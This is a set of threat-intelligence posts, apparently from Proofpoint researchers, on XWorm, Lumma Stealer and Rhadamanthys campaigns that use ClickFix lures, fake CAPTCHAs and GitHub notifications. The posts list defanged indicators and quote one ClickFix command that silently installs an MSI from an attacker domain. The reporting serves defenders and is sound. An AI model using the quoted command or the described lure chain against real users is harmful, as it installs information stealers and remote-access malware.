Since 14 October, we’ve tracked a high volume XWorm campaign targeting Germany. The activity is attributed to TA584, a sophisticated #cybercrime group tracked since 2020.

Messages are sent from hundreds of compromised sender accounts impersonating ELSTER and contain malicious URLs.

These URLs are either attacker-controlled URLs hosted on compromised websites, AWS-hosted URLs that redirect to those same sites, or unique Trend Micro click-time protection URLs that redirect to the AWS URLs. Proofpoint has notified Trend Micro about the potential abuse.

The compromised websites redirect the user to the attacker-controlled domain, which performs IP filtering. If passed, the visitor is redirected to the LP which contains a matching themed page with a "Slide" CAPTCHA. If the CAPTCHA is resolved, a ClickFix page guides users to follow instructions.

If the ClickFix instructions are followed, it will execute a remote PowerShell script that disables AMSI, loads a memory‑only .NET loader (included in the script) which injects an XWorm payload into RegSvcs.exe, clears the clipboard, and exits.

The user is redirected to a legit website if the ClickFix command is successful. This is done via server-side check (most likely based on IP) and response to post to https[:]//[InvolvedHostName][.]top/api/exe.

Proofpoint tracks this variant of XWorm as “P0WER” due to that is uses this string as AES Key. This variant always uses SharpHide for persistence by setting up a hidden registry key that will execute another remote PowerShell script on each boot to run XWorm again.

Proofpoint assesses TA584 is an initial access provider whose compromises can lead to #ransomware.

Historically, this actor focused on North America and the UK. TA584 expanded its targeting to include European entities including Germany since 1 July 2025.

---

Landing page: hxxps://www[.]eportal-npa[.]elster-de[.]quick-print[.]top/ePortal/ or hxxps://www[.]npa-eportal[.]digital-service[.]elster-de[.]status-drive[.]top/ePortal/

Click Payload: hxxp://94[.]159[.]113[.]37/ssd.png | b6956f45bd3c7b3009a31f0caf087d0686e60ee96978766a9f6477b8b093eace

XWorm C2: 85[.]208[.]84[.]208:4411

SharpHide Payload: 85[.]208[.]84[.]208/x.jpg

Threat actors continue to abuse GitHub to deliver malware, this time: #LummaStealer. We identified GitHub notification emails that kick off the attack chain. Messages are sent when the threat actor, using an actor-controlled account, comments on existing GitHub issues.

The comment includes either a link to the actor-controlled domain droplink[.]digital, a Dropbox URL, or a file attached directly to the issue (which creates a link to the file hosted on GitHub). They claim to provide a fix for the reported problem. People who get these emails may include: the issue creator, the repository owner, the issue assignee, or any watchers.

The downloaded file is always named “fix.zip”, which contains “x86_64-w64-ranlib.exe” and “msvcp140.dll”. If the executable is run, it launches #Lumma via “msbuild.exe”.

The hash of the executable (and therefore the ZIP file) may vary depending on when the Lumma payload was built. Example:

File name: fix.zip

Retrieved From: hxxps://objects[.]githubusercontent[.]com/github-production-repository-file-5c1aeb/195216627/22101425?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20250903%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250903T111859Z&X-Amz-Expires=300&X-Amz-Signature=f0cd8226472614321e6b9e3b883bffe0adf9d9255af1207374947ea71d3c8f76&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3Bfilename%3Dfix.zip&response-content-type=application%2Fx-zip-compressed

MD5: 4d8730a2f3388d018b7793f03fb79464

SHA1: cbc5b2181854a2672013422e02df9ea35c3c9e1c

SHA256: c8af1b27b718508574055b4271adc7246ddf4cec1c50b258d2c4179b19d0c839

Although GitHub has removed some of the malicious comments, the links in the messages remained active as of September 3, including the actor-controlled URLs.

On September 2-3 some of the files attached to the issues had random file names and were encrypted. While they contained an executable with the same name, the threat actor did not provide the password for these files so they could not be extracted and lead to any malware installation.

Proofpoint identified a unique attack chain leveraging GitHub notifications to deliver #Rhadamanthys.

We first spotted this post by @anyrun_app about ClickFix delivering Rhadamanthys and began investigating. https://infosec.exchange/@anyrun_app/115019769476243964

We identified GitHub notification emails that kick off the attack chain. The emails are likely generated by the threat actor creating an issue in an actor-controlled repository with a fake security warning, and then tagging legitimate accounts who receive notifications that they have been tagged, with the text from the issue.

The notifications contain shortened URLs that will lead to an actor-controlled website. The website will perform filtering functions, and if those checks are passed, the visitor will be redirected to a website that presents a fake GitHub-branded CAPTCHA instructing users to verify they are human.

Following the instructions will initiate a command that downloads and executes malware.

The specific malware may vary throughout the campaign.

At the time of analysis, the ClickFix Payload URL has led to the Rhadamanthys malware.

Notably, this chain uses CoreSecThree infrastructure, previously only observed to be used on compromised websites as an inject.

CoreSecThree is a delivery framework leveraged for filtering and enabling ClickFix campaigns to distribute malware, typically information stealers.

CoreSecThree is likely operated by a single threat actor. Proofpoint assesses with medium confidence that both the campaigns via compromised websites and this GitHub campaign are performed by the same threat actor.

Example ClickFix command: msiexec /i hxxps:///temopix[.]com /qn

Example of MSI: shields.msi | File Size: 10981376 Byte(s) (10,47 MB) | SHA256: 4c9df28e6b802ebe9e40f8fe34d2014b1fe524c64f7c8bd013f163c4daa794b2

Example system commands:

C:\Users\<username>\AppData\Local\Programs\MediaHuman Lyrics Finder Free\LdVBoxSVC.exe LdVBoxSVC.exe

Bitly redirect: hxxps://gitsecguards[.]com

ClickFix Landing domain: security[.]flaxergaurds[.]com

Organizations are encouraged to restrict PowerShell to only approved administrative users.

⚠️ Proofpoint researchers have identified an increase in the unique #socialengineering technique called #ClickFix. ⚠️

The technique is being used by financially motivated threat actors and reportedly by suspected espionage-focused groups.

Read the security brief: https://ow.ly/WYXX50U9eZq

---

How the lure works: The #ClickFix social engineering technique uses dialogue boxes containing fake error messages to trick people into copying, pasting, and running malicious content on their own computer.

Notably, we've observed threat actors using a fake CAPTCHA-themed lure that pretends to validate the user with a "Verify You Are Human" (CAPTCHA) check.

This activity leverages a toolkit named reCAPTCHA Phish, released by a security researcher on GitHub for educational purposes.

Just days after the open-source toolkit was released on GitHub, Proofpoint
began observing it in email threat data.

See our security brief for several recent examples of the ClickFix technique in action.

New research from @Ffforward and myself looking at the return of TA576, a cybercriminal threat actor that uses tax-themed lures specifically targeting accounting and finance organizations.

They always pop up during tax season in the US and use lures with funny back stories (help! my last accountant messed up my taxes).

https://www.proofpoint.com/us/blog/threat-insight/security-brief-tis-season-tax-hax